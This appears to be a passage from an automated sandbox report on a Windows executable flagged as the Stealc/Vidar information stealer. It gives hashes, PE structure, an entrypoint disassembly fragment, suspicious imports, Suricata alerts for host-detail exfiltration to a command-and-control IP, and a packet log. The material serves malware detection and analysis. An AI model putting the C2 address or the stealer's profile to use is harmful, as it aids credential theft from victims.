                                                                                                                                                                                                                                                                                                URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                                                                Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                                                                                                Chrome Cache Entry: 563

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                                Size (bytes):1660
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                                                MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                                                SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                                                SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                                                SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.454649285943866
                                                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                File name:ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File size:147'968 bytes
                                                                                                                                                                                                                                                                                                MD5:cc36e2a5a3c64941a79c31ca320e9797
                                                                                                                                                                                                                                                                                                SHA1:50c8f5db809cfec84735c9f4dcd6b55d53dfd9f5
                                                                                                                                                                                                                                                                                                SHA256:6fec179c363190199c1dcdf822be4d6b1f5c4895ebc7148a8fc9fa9512eeade8
                                                                                                                                                                                                                                                                                                SHA512:fcea6d62dc047e40182dc4ff1e0522ca935f9aeefdb1517957977bc5d9ac654285a973261401f3b98abf1f6ed62638b9e31306fd7aaeb67214ca42dfc2888af0
                                                                                                                                                                                                                                                                                                SSDEEP:3072:lOBRrLUOPed9xOi756fJnhsRSK2C22/m4ESZo3XRYzXIkQfyXzdEpx:A/rLVPW0nsP2Xy+TJfWzW7
                                                                                                                                                                                                                                                                                                TLSH:E0E36C71A2C2A1B2CA4D33742A3E77FD9D709B222B04CDDBDBC4FC186E691D256B1416
                                                                                                                                                                                                                                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ag.....................`....................@...........................#.............................................(......

                                                                                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                                                                                Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Entrypoint:0x4185c0
                                                                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                DLL Characteristics:NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                Time Stamp:0x676198A3 [Tue Dec 17 15:28:35 2024 UTC]
                                                                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                Import Hash:8329c46c809815bc572f208fdd794284

                                                                                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                                                je 00007FC8351848D5h
                                                                                                                                                                                                                                                                                                jne 00007FC8351848D3h
                                                                                                                                                                                                                                                                                                mov eax, 000046E8h
                                                                                                                                                                                                                                                                                                add byte ptr [ebx+eax+75h], dh
                                                                                                                                                                                                                                                                                                add dword ptr [eax-01754318h], edi
                                                                                                                                                                                                                                                                                                push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                                                                add dword ptr [eax-0175DD18h], edi
                                                                                                                                                                                                                                                                                                push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                                                                add dword ptr [eax-01747718h], edi
                                                                                                                                                                                                                                                                                                push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                                                                add dword ptr [eax-01746118h], edi
                                                                                                                                                                                                                                                                                                push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                                                                add dword ptr [eax-01740B18h], edi
                                                                                                                                                                                                                                                                                                push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                                                                add dword ptr [eax-00139518h], edi
                                                                                                                                                                                                                                                                                                push dword ptr [ecx]
                                                                                                                                                                                                                                                                                                rol dl, 00000010h
                                                                                                                                                                                                                                                                                                add ah, cl
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                push 00420553h
                                                                                                                                                                                                                                                                                                call dword ptr [004219D4h]
                                                                                                                                                                                                                                                                                                mov dword ptr [006351C4h], eax
                                                                                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                                                                                je 00007FC835184A94h
                                                                                                                                                                                                                                                                                                push 00420101h
                                                                                                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                                                                                                call 00007FC835171092h
                                                                                                                                                                                                                                                                                                mov dword ptr [00634F6Ch], eax
                                                                                                                                                                                                                                                                                                push 00420CB1h
                                                                                                                                                                                                                                                                                                push dword ptr [006351C4h]
                                                                                                                                                                                                                                                                                                call 00007FC83517107Dh
                                                                                                                                                                                                                                                                                                mov dword ptr [00634F68h], eax
                                                                                                                                                                                                                                                                                                push 00420D79h
                                                                                                                                                                                                                                                                                                push dword ptr [006351C4h]
                                                                                                                                                                                                                                                                                                call 00007FC835171068h
                                                                                                                                                                                                                                                                                                mov dword ptr [00634F70h], eax
                                                                                                                                                                                                                                                                                                push 00420D50h
                                                                                                                                                                                                                                                                                                push dword ptr [006351C4h]
                                                                                                                                                                                                                                                                                                call 00007FC835171053h
                                                                                                                                                                                                                                                                                                mov dword ptr [00634FD8h], eax
                                                                                                                                                                                                                                                                                                push 00420D5Bh
                                                                                                                                                                                                                                                                                                push dword ptr [006351C4h]
                                                                                                                                                                                                                                                                                                call 00007FC83517103Eh

                                                                                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x217280xc8.rdata
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x2370000x149c.reloc
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1fbd80x5c.rdata
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x219880x198.rdata
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                .text0x10000x1dd780x1de000ce5587661d15577632e53c8a6001885False0.5060800209205021data6.454457697482663IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                .rdata0x1f0000x31cc0x3200229d4dc7a9afabe735f24c4f77484ea8False0.49109375DOS executable (block device driver)5.681318885089064IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                .data0x230000x2121e00x1600bc81a9497a63b536266387a4e7cae584unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                .00cfg0x2360000x40x20007ada419974a1f82db6bdd49d543272bFalse0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                .reloc0x2370000x149c0x1600087859e7d46786662434790d6717c7baFalse0.7935014204545454data6.591187625006626IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                                                                                KERNEL32.dllCloseHandle, CreateDirectoryA, CreateFileA, CreateThread, ExitProcess, ExpandEnvironmentStringsA, FileTimeToSystemTime, FindClose, FindFirstFileA, FindNextFileA, GetComputerNameA, GetCurrentProcess, GetDriveTypeA, GetFileInformationByHandle, GetFileSize, GetLastError, GetLocalTime, GetLogicalDriveStringsA, GetLogicalProcessorInformationEx, GetModuleHandleA, GetProcessHeap, GetTickCount, HeapAlloc, HeapFree, OpenProcess, RaiseException, ReadFile, ReadProcessMemory, SetFilePointer, Sleep, SystemTimeToFileTime, VirtualAlloc, VirtualAllocExNuma, VirtualFree, VirtualQueryEx, WaitForSingleObject, WriteFile, lstrcatA, lstrcmpiW, lstrcpyA, lstrlenA
                                                                                                                                                                                                                                                                                                msvcrt.dll??2@YAPAXI@Z, ??3@YAXPAX@Z, ??_U@YAPAXI@Z, ??_V@YAXPAX@Z, _itoa_s, _splitpath, atexit, free, isupper, malloc, memchr, memcmp, memcpy, memmove, memset, rand, srand, strchr, strcmp, strcpy, strcpy_s, strlen, strncpy, strstr, strtok_s
                                                                                                                                                                                                                                                                                                USER32.dllCharToOemA, CloseDesktop, CreateDesktopA, GetDesktopWindow, OpenDesktopA, wsprintfA, wsprintfW
                                                                                                                                                                                                                                                                                                api-ms-win-crt-runtime-l1-1-0.dll_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                                api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsnprintf_s
                                                                                                                                                                                                                                                                                                ADVAPI32.dllGetCurrentHwProfileA, GetUserNameA, RegGetValueA, RegOpenKeyExA
                                                                                                                                                                                                                                                                                                SHELL32.dllSHFileOperationA, SHGetFolderPathA
                                                                                                                                                                                                                                                                                                WS2_32.dllWSACleanup, WSAStartup, closesocket, connect, freeaddrinfo, getaddrinfo, htons, recv, send, socket
                                                                                                                                                                                                                                                                                                SHLWAPI.dllPathFileExistsA

                                                                                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                2024-12-20T07:31:06.772119+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.649716116.203.12.114443TCP
                                                                                                                                                                                                                                                                                                2024-12-20T07:31:09.191655+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.649722116.203.12.114443TCP
                                                                                                                                                                                                                                                                                                2024-12-20T07:31:11.495790+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1116.203.12.114443192.168.2.649729TCP
                                                                                                                                                                                                                                                                                                2024-12-20T07:31:13.791133+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11116.203.12.114443192.168.2.649742TCP

                                                                                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:55.466876030 CET4434970720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:55.466964960 CET49707443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:55.471556902 CET49707443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:55.471568108 CET4434970720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:55.472081900 CET4434970720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:55.477852106 CET49707443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:55.478020906 CET49707443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:55.478028059 CET4434970720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:55.478162050 CET49707443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:55.523339987 CET4434970720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:55.738099098 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:55.769244909 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:56.081737995 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:56.139846087 CET4434970720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:56.139949083 CET4434970720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:56.140022993 CET49707443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:56.140175104 CET49707443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:56.140192032 CET4434970720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:59.171467066 CET49712443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:59.171525955 CET44349712149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:59.171588898 CET49712443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:59.192852020 CET49712443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:59.192900896 CET44349712149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:00.632603884 CET44349712149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:00.632703066 CET49712443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:00.937006950 CET49712443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:00.937028885 CET44349712149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:00.937359095 CET44349712149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:00.937437057 CET49712443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:00.940908909 CET49712443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:00.983349085 CET44349712149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.368261099 CET44349712149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.368293047 CET44349712149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.368372917 CET49712443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.368376970 CET44349712149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.368432999 CET44349712149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.368449926 CET49712443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.368451118 CET44349712149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.368468046 CET49712443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.368493080 CET49712443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.383059978 CET49712443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.383090973 CET44349712149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.718173981 CET49714443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.718223095 CET4434971420.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.718290091 CET49714443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.719043970 CET49714443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.719059944 CET4434971420.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.723459959 CET49715443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.723490953 CET44349715116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.723548889 CET49715443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.723896027 CET49715443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.723906040 CET44349715116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:03.550002098 CET44349715116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:03.550071001 CET49715443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:03.568105936 CET49715443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:03.568139076 CET44349715116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:03.568483114 CET44349715116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:03.568672895 CET49715443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:03.569092989 CET49715443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:03.611346006 CET44349715116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:03.931451082 CET4434971420.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:03.931562901 CET49714443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:03.982794046 CET49714443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:03.982886076 CET4434971420.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:03.983618975 CET4434971420.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.034847975 CET49714443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.069564104 CET49714443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.069710970 CET49714443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.069725990 CET4434971420.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.070003033 CET49714443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.115336895 CET4434971420.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.258596897 CET44349715116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.258675098 CET44349715116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.258702993 CET49715443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.258733034 CET49715443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.339545012 CET49715443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.339579105 CET44349715116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.469412088 CET49716443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.469460011 CET44349716116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.469520092 CET49716443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.471420050 CET49716443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.471441031 CET44349716116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.732024908 CET4434971420.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.732141018 CET4434971420.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.732192039 CET49714443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.732311964 CET49714443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:04.732326984 CET4434971420.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:05.347337961 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:05.376797915 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:05.691097021 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:05.886213064 CET44349716116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:05.886378050 CET49716443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:05.886683941 CET49716443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:05.886694908 CET44349716116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:05.890927076 CET49716443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:05.890933037 CET44349716116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.549937963 CET49721443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.549982071 CET4434972120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.550074100 CET49721443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.551225901 CET49721443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.551239014 CET4434972120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.772159100 CET44349716116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.772254944 CET44349716116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.772258043 CET49716443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.772329092 CET49716443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.777704954 CET49716443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.777723074 CET44349716116.203.12.114192.168.2.6
